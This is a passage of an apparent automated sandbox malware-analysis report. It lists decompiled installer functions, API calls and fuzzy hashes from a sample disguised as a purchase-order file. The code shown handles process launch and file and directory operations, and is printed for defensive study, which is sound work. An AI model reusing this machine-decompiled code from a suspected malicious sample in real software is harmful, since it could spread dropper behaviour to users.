                                                                                                                          • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                                                                          0x00401e21
                                                                                                                          0x00401e26
                                                                                                                          0x00401e2c
                                                                                                                          0x00401e33
                                                                                                                          0x00401e36
                                                                                                                          0x00402672
                                                                                                                          0x00401e3c
                                                                                                                          0x00401e3f
                                                                                                                          0x00401e50
                                                                                                                          0x00401e4b
                                                                                                                          0x00401e4b
                                                                                                                          0x00401e65
                                                                                                                          0x00401e6e
                                                                                                                          0x00401e7e
                                                                                                                          0x00401e80
                                                                                                                          0x00401e80
                                                                                                                          0x00401e70
                                                                                                                          0x00401e74
                                                                                                                          0x00401e74
                                                                                                                          0x00401e6e
                                                                                                                          0x00401e87
                                                                                                                          0x00401e8a
                                                                                                                          0x00401e8a
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                                                                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                                                                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                                                                                            • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                                                                                            • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521207402-0
                                                                                                                          • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                                                                                          • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                                                                                                                          • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                                                                                          • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040365C Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040365C() {
				void* _t1;
				void* _t2;
				void* _t4;
				void* _t7;
				signed int _t12;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
				}
				_t2 =  *0x409018; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t12 =  *0x409018;
				}
				E004036B9();
				_t4 = E00405620(_t7, _t12, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nsqB9A4.tmp\\", 7); // executed
				return _t4;
			}








                                                                                                                          0x0040365c
                                                                                                                          0x0040366b
                                                                                                                          0x0040366e
                                                                                                                          0x00403670
                                                                                                                          0x00403670
                                                                                                                          0x00403677
                                                                                                                          0x0040367f
                                                                                                                          0x00403682
                                                                                                                          0x00403684
                                                                                                                          0x00403684
                                                                                                                          0x00403684
                                                                                                                          0x0040368b
                                                                                                                          0x00403697
                                                                                                                          0x0040369d

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\, xrefs: 00403692
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqB9A4.tmp\
                                                                                                                          • API String ID: 2962429428-2152100299
                                                                                                                          • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                                                                                          • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                                                                                                                          • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                                                                                          • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423fb0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42376c =  *0x42376c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
					}
				}
				return 0;
			}











                                                                                                                          0x0040138a
                                                                                                                          0x004013fa
                                                                                                                          0x0040139b
                                                                                                                          0x004013a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004013a2
                                                                                                                          0x004013a3
                                                                                                                          0x004013ad
                                                                                                                          0x00000000
                                                                                                                          0x00401404
                                                                                                                          0x004013b0
                                                                                                                          0x004013b7
                                                                                                                          0x004013bd
                                                                                                                          0x004013be
                                                                                                                          0x004013c0
                                                                                                                          0x004013c2
                                                                                                                          0x004013b9
                                                                                                                          0x004013b9
                                                                                                                          0x004013ba
                                                                                                                          0x004013ba
                                                                                                                          0x004013c9
                                                                                                                          0x004013cb
                                                                                                                          0x004013f4
                                                                                                                          0x004013f4
                                                                                                                          0x004013c9
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                          • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                                                                                          • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                                                                                                                          • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                                                                                          • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406087 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406087(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409248);
				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
				}
				_t5 = E0040601D(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406099
                                                                                                                          0x004060a1
                                                                                                                          0x004060ad
                                                                                                                          0x00000000
                                                                                                                          0x004060b4
                                                                                                                          0x004060a4
                                                                                                                          0x004060ab
                                                                                                                          0x00000000
                                                                                                                          0x004060bc
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                                                                            • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                                                                                                                            • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                                                                                                                            • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2547128583-0
                                                                                                                          • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                                                                                          • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
                                                                                                                          • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                                                                                          • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004059D2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E004059D2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                          0x004059d6
                                                                                                                          0x004059e3
                                                                                                                          0x004059f8
                                                                                                                          0x004059fe

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,80000000,00000003), ref: 004059D6
                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                                                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                                                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405526 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405526(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                          0x0040552c
                                                                                                                          0x00405534
                                                                                                                          0x00000000
                                                                                                                          0x0040553a
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                                                                                                                          • GetLastError.KERNEL32 ref: 0040553A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                                                                          • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                                                                                                                          • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                                                                                          • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004059B3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004059B3(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                                                                                                          0x004059b7
                                                                                                                          0x004059c0
                                                                                                                          0x004059c9
                                                                                                                          0x00000000
                                                                                                                          0x004059c9
                                                                                                                          0x004059cf

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                                                                                                                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                                                                                          • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                                                                                                                          • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                                                                                          • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004031D5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004031D5(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                          0x004031d9
                                                                                                                          0x004031ec
                                                                                                                          0x004031f4
                                                                                                                          0x00000000
                                                                                                                          0x004031fb
                                                                                                                          0x00000000
                                                                                                                          0x004031fd

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,0040B120,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                                                                          • Instruction ID: d6fbb751533e8173f5cb9bb8eb792094bbd109b1eecd8ff5b75a0af7a5988eec
                                                                                                                          • Opcode Fuzzy Hash: 0be395bbe571093c8e78859d05ee89954336de5599fe3087c5eab9dc4054fae4
                                                                                                                          • Instruction Fuzzy Hash: 77E08C32104118BBDF209F619C05EA73F5CEB053A2F00C037FA25E52A1D230EA149BA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403207 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403207(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                          0x00403215
                                                                                                                          0x0040321b

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                                                                          • Instruction ID: 89776e93a0172b97a38fb7948c015c90ed7fb14eba3da05579cbd58eb2c2bcc6
                                                                                                                          • Opcode Fuzzy Hash: 1fe8ad6970e23be315a08abdb90e0b058f57890677f29add635e0ec7003afc6f
                                                                                                                          • Instruction Fuzzy Hash: 87B01271644200BFDB214F00DF06F057B61A794701F108030B744380F082712830EB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

